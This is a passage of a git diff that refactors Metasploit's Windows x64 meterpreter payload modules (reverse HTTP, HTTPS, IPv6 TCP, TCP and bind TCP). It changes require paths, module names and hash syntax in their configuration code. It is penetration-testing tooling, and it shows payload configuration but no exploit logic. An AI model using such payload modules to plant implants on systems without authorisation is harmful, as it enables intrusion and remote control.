datastore['SessionExpirationTimeout'].to_i, - :uuid => opts[:uuid], - :transports => [transport_config_bind_tcp(opts)], - :extensions => (datastore['EXTENSIONS'] || '').split(',') + arch: opts[:uuid].arch, + exitfunk: datastore['EXITFUNC'], + expiration: datastore['SessionExpirationTimeout'].to_i, + uuid: opts[:uuid], + transports: [transport_config_bind_tcp(opts)], + extensions: (datastore['EXTENSIONS'] || '').split(',') } # create the configuration instance based off the parameters diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb index dc4a34d6af..1ccc32812d 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb @@ -4,7 +4,7 @@ ## require 'msf/core' -require 'msf/core/transport_config' +require 'msf/core/payload/transport_config' require 'msf/core/handler/reverse_http' require 'msf/core/payload/windows/x64/meterpreter_loader' require 'msf/base/sessions/meterpreter_x64_win' @@ -15,7 +15,7 @@ module Metasploit4 CachedSize = 1129142 - include Msf::TransportConfig + include Msf::Payload::TransportConfig include Msf::Payload::Windows include Msf::Payload::Single include Msf::Payload::Windows::MeterpreterLoader_x64 @@ -45,20 +45,20 @@ module Metasploit4 def generate_config(opts={}) unless opts[:uuid] - opts[:uuid] = Msf::Payload::UUID.new({ - :platform => 'windows', - :arch => ARCH_X64 - }) + opts[:uuid] = Msf::Payload::UUID.new( + platform: 'windows', + arch: ARCH_X64 + ) end # create the configuration block config_opts = { - :arch => opts[:uuid].arch, - :exitfunk => datastore['EXITFUNC'], - :expiration => datastore['SessionExpirationTimeout'].to_i, - :uuid => opts[:uuid], - :transports => [transport_config_reverse_http(opts)], - :extensions => (datastore['EXTENSIONS'] || '').split(',') + arch: opts[:uuid].arch, + exitfunk: datastore['EXITFUNC'], + expiration: datastore['SessionExpirationTimeout'].to_i, + uuid: opts[:uuid], + transports: [transport_config_reverse_http(opts)], + extensions: (datastore['EXTENSIONS'] || '').split(',') } # create the configuration instance based off the parameters diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb index d008d3f424..43132014c6 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb @@ -4,7 +4,7 @@ ## require 'msf/core' -require 'msf/core/transport_config' +require 'msf/core/payload/transport_config' require 'msf/core/handler/reverse_https' require 'msf/core/payload/windows/x64/meterpreter_loader' require 'msf/base/sessions/meterpreter_x64_win' @@ -15,7 +15,7 @@ module Metasploit4 CachedSize = 1129142 - include Msf::TransportConfig + include Msf::Payload::TransportConfig include Msf::Payload::Windows include Msf::Payload::Single include Msf::Payload::Windows::MeterpreterLoader_x64 @@ -45,20 +45,20 @@ module Metasploit4 def generate_config(opts={}) unless opts[:uuid] - opts[:uuid] = Msf::Payload::UUID.new({ - :platform => 'windows', - :arch => ARCH_X64 - }) + opts[:uuid] = Msf::Payload::UUID.new( + platform: 'windows', + arch: ARCH_X64 + ) end # create the configuration block config_opts = { - :arch => opts[:uuid].arch, - :exitfunk => datastore['EXITFUNC'], - :expiration => datastore['SessionExpirationTimeout'].to_i, - :uuid => opts[:uuid], - :transports => [transport_config_reverse_http(opts)], - :extensions => (datastore['EXTENSIONS'] || '').split(',') + arch: opts[:uuid].arch, + exitfunk: datastore['EXITFUNC'], + expiration: datastore['SessionExpirationTimeout'].to_i, + uuid: opts[:uuid], + transports: [transport_config_reverse_http(opts)], + extensions: (datastore['EXTENSIONS'] || '').split(',') } # create the configuration instance based off the parameters diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb index 20948a1076..fb46f4329d 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb @@ -4,7 +4,7 @@ ## require 'msf/core' -require 'msf/core/transport_config' +require 'msf/core/payload/transport_config' require 'msf/core/handler/reverse_tcp' require 'msf/core/payload/windows/x64/meterpreter_loader' require 'msf/base/sessions/meterpreter_x64_win' @@ -15,7 +15,7 @@ module Metasploit4 CachedSize = 1128098 - include Msf::TransportConfig + include Msf::Payload::TransportConfig include Msf::Payload::Windows include Msf::Payload::Single include Msf::Payload::Windows::MeterpreterLoader_x64 @@ -46,20 +46,20 @@ module Metasploit4 def generate_config(opts={}) unless opts[:uuid] - opts[:uuid] = Msf::Payload::UUID.new({ - :platform => 'windows', - :arch => ARCH_X64 - }) + opts[:uuid] = Msf::Payload::UUID.new( + platform: 'windows', + arch: ARCH_X64 + ) end # create the configuration block config_opts = { - :arch => opts[:uuid].arch, - :exitfunk => datastore['EXITFUNC'], - :expiration => datastore['SessionExpirationTimeout'].to_i, - :uuid => opts[:uuid], - :transports => [transport_config_reverse_ipv6_tcp(opts)], - :extensions => (datastore['EXTENSIONS'] || '').split(',') + arch: opts[:uuid].arch, + exitfunk: datastore['EXITFUNC'], + expiration: datastore['SessionExpirationTimeout'].to_i, + uuid: opts[:uuid], + transports: [transport_config_reverse_ipv6_tcp(opts)], + extensions: (datastore['EXTENSIONS'] || '').split(',') } # create the configuration instance based off the parameters diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb index 84a9f32fc5..0f732aebca 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb @@ -5,7 +5,7 @@ require 'msf/core' require 'msf/core/handler/reverse_tcp' -require 'msf/core/transport_config' +require 'msf/core/payload/transport_config' require 'msf/core/payload/windows/x64/meterpreter_loader' require 'msf/base/sessions/meterpreter_x64_win' require 'msf/base/sessions/meterpreter_options' @@ -15,7 +15,7 @@ module Metasploit4 CachedSize = 1128098 - include Msf::TransportConfig + include Msf::Payload::TransportConfig include Msf::Payload::Windows include Msf::Payload::Single include Msf::Payload::Windows::MeterpreterLoader_x64 @@ -45,20 +45,20 @@ module Metasploit4 def generate_config(opts={}) unless opts[:uuid] - opts[:uuid] = Msf::Payload::UUID.new({ - :platform => 'windows', - :arch => ARCH_X64 - }) + opts[:uuid] = Msf::Payload::UUID.new( + platform: 'windows', + arch: ARCH_X64 + ) end # create the configuration block config_opts = { - :arch => opts[:uuid].arch, - :exitfunk => datastore['EXITFUNC'], - :expiration => datastore['SessionExpirationTimeout'].to_i, - :uuid => opts[:uuid], - :transports => [transport_config_reverse_tcp(opts)], - :extensions => (datastore['EXTENSIONS'] || '').split(',') + arch: opts[:uuid].arch, + exitfunk: datastore['EXITFUNC'], + expiration: datastore['SessionExpirationTimeout'].to_i, + uuid: opts[:uuid], + transports: [transport_config_reverse_tcp(opts)], + extensions: (datastore['EXTENSIONS'] || '').split(',') } # create the configuration instance based off the parameters